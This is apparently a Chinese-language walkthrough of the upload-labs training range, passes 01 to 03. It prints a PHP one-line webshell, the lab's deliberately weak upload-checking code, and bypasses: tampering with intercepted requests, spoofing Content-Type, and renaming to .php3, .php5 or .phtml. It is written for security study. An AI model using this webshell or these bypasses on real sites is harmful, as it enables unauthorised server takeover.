#upload-labs
pass-01
首先先直接上传hack.php(<?php eval($_POST['READER']);?>),一句话木马试试水
结果出错
“该文件不允许上传,请上传.jpg|.png|.gif类型的文件,当前文件类型为:.php”
盲猜是前端代码所致,所以采用通用做法先上传一句话木马图片hack.jpg
然后通过抓包
上传成功,后面就用Cknife连接一句话解决
Pass-02
通过查看源码,发现对上传的文件类型有要求
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
}
}
再次通过抓包改包。先直接上传hack.php
再通过修改Content-Type为image/jpeg,成功上传
再通过C刀连接
Pass-03
通过查看源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
发现对.asp .aspx .php .jsp有过滤,并且就算成功上传后,文件名字也进行了修改,变成时间戳+随机四位数字
(ps:在做这题的时候,环境得在配置一下,要修改httped-conf,在 AddType application/x-httpd-php .php .phtml 这句话后面添上.php3 .php5)
即使如此还是可以进行绕过处理
先直接上传hack.php,再通过burp进行拦截,将请求包发到Repeater中,再将hack.php改为hack.php3 or hack.php5 or hack.phtml
通过查看Response可以发现
名字被改成了201911060201256707.php3
最后用C刀连接